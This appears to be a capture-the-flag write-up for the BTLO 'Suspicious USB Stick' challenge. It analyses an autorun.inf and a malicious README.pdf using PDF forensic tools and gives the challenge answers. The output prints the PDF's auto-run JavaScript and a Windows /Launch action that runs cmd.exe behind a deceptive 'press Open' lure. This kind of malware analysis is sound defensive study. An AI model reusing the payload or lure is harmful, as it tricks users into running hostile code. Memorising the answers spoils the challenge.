BTLO Challenge Suspicious USB Stick(Retired Challenge)

Scenario

One of our clients informed us they recently suffered an employee data breach. As a startup company, they had a constrained budget allocated for security and employee training. I visited them and spoke with the relevant stakeholders. I also collected some suspicious emails and a USB drive an employee found on their premises. While I am analyzing the suspicious emails, can you check the contents on the USB drive?

Reading Material:
https://zeltser.com/analyzing-malicious-documents/
https://en.wikipedia.org/wiki/List_of_file_signatures
https://eternal-todo.com/tools/peepdf-pdf-analysis-tool.

Challenge Submission

1. What file is the autorun.inf running? (3 points)

Format: filename.extension

$ cat autorun.inf 
[autorun]
open=README.pdf
icon=autorun.ico

Answer: README.pdf

2. Does the pdf file pass virustotal scan? (No malicious results returned) (2 points)

True or False

SHA256: c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43 https://www.virustotal.com/gui/file/c868cd6ae39dc3ebbc225c5f8dc86e3b01097aa4b0076eac7960256038e60b43

38/59

Answer: False

3. Does the file have the correct magic number? (2 points)

True or False

$ file README.pdf 
README.pdf: PDF document, version 1.7
$ hexdump -C README.pdf | head
00000000  25 50 44 46 2d 31 2e 37  0d 0a 25 b5 b5 b5 b5 0d  |%PDF-1.7..%.....|
00000010  0a 31 20 30 20 6f 62 6a  0d 0a 3c 3c 2f 54 79 70  |.1 0 obj..<</Typ|
00000020  65 2f 43 61 74 61 6c 6f  67 2f 50 61 67 65 73 20  |e/Catalog/Pages |
00000030  32 20 30 20 52 2f 4c 61  6e 67 28 65 6e 2d 55 53  |2 0 R/Lang(en-US|
00000040  29 20 2f 53 74 72 75 63  74 54 72 65 65 52 6f 6f  |) /StructTreeRoo|
00000050  74 20 31 30 20 30 20 52  2f 4d 61 72 6b 49 6e 66  |t 10 0 R/MarkInf|
00000060  6f 3c 3c 2f 4d 61 72 6b  65 64 20 74 72 75 65 3e  |o<</Marked true>|
00000070  3e 2f 4d 65 74 61 64 61  74 61 20 32 30 20 30 20  |>/Metadata 20 0 |
00000080  52 2f 56 69 65 77 65 72  50 72 65 66 65 72 65 6e  |R/ViewerPreferen|
00000090  63 65 73 20 32 31 20 30  20 52 3e 3e 0d 0a 65 6e  |ces 21 0 R>>..en|

Answer: True

4. What OS type can the file exploit? (Linux, MacOS, Windows, etc) (5 points)

Operating System

$ pdfinfo  README.pdf 
Creator:        StarMan
CreationDate:   Thu Feb 11 02:54:49 2021 EST
ModDate:        Thu Feb 11 02:54:49 2021 EST
Tagged:         yes
UserProperties: no
Suspects:       no
Form:           none
Syntax Warning: Bad launch-type link action
JavaScript:     no
Pages:          1
Encrypted:      no
Page size:      612 x 792 pts (letter)
Page rot:       0
File size:      136561 bytes
Optimized:      no
PDF version:    1.7
$ pdfid  README.pdf 
PDFiD 0.2.7 README.pdf
 PDF Header: %PDF-1.7
 obj                   25
 endobj                25
 stream                 7
 endstream              7
 xref                   4
 trailer                4
 startxref              4
 /Page                  2
 /Encrypt               0
 /ObjStm                1
 /JS                    1
 /JavaScript            1
 /AA                    1
 /OpenAction            1
 /AcroForm              0
 /JBIG2Decode           0
 /RichMedia             0
 /Launch                1
 /EmbeddedFile          0
 /XFA                   0
 /Colors > 2^24         0
$ pdf-parser -a README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
Comment: 8
XREF: 4
Trailer: 4
StartXref: 4
Indirect object: 24
  8: 4, 9, 18, 19, 21, 24, 26, 9
 /Action 2: 27, 28
 /Catalog 2: 1, 1
 /ExtGState 2: 7, 8
 /Filespec 1: 25
 /Font 1: 5
 /FontDescriptor 1: 6
 /Metadata 2: 20, 20
 /ObjStm 1: 17
 /Page 2: 3, 3
 /Pages 1: 2
 /XRef 1: 22
Search keywords:
 /JS 1: 27
 /JavaScript 1: 27
 /AA 1: 3
 /OpenAction 1: 1
 /Launch 1: 28
# /JS,/JavaScript,/OpenAction,/Launchのチェック
$ pdf-parser -o 27 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 27 0
 Type: /Action
 Referencing: 

  <<
    /S /JavaScript
    /JS (this.exportDataObject({ cName: "README", nLaunch: 0 });)
    /Type /Action
  >>
$ pdf-parser -o 1 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>


obj 1 0
 Type: /Catalog
 Referencing: 2 0 R, 23 0 R, 27 0 R, 10 0 R, 20 0 R, 21 0 R

  <<
    /Type /Catalog
    /Pages 2 0 R
    /Names 23 0 R
    /OpenAction 27 0 R
    /Lang (en-US)
    /StructTreeRoot 10 0 R
    /MarkInfo
      <<
        /Marked true
      >>
    /Metadata 20 0 R
    /ViewerPreferences 21 0 R
  >>
$ pdf-parser -o 28 README.pdf 
This program has not been tested with this version of Python (3.9.7)
Should you encounter problems, please use Python version 3.8.7
obj 28 0
 Type: /Action
 Referencing: 

  <<
    /S /Launch
    /Type /Action
    /Win
      <<
        /F (cmd.exe)
        /D '(c:\\\\windows\\\\system32)'
        /P '(/Q /C %HOMEDRIVE%&cd %HOMEPATH%&(if exist "Desktop\\\\README.pdf" (cd "Desktop"))&(if exist "My Documents\\\\README.pdf" (cd "My Documents"))&(if exist "Documents\\\\README.pdf" (cd "Documents"))&(if exist "Escritorio\\\\README.pdf" (cd "Escritorio"))&(if exist "Mis Documentos\\\\README.pdf" (cd "Mis Documentos"))&(start README.pdf)\n\n\n\n\n\n\n\n\n\nTo view the encrypted content please tick the "Do not show this message again" box and press Open.)'
      >>
  >>

Answer: windows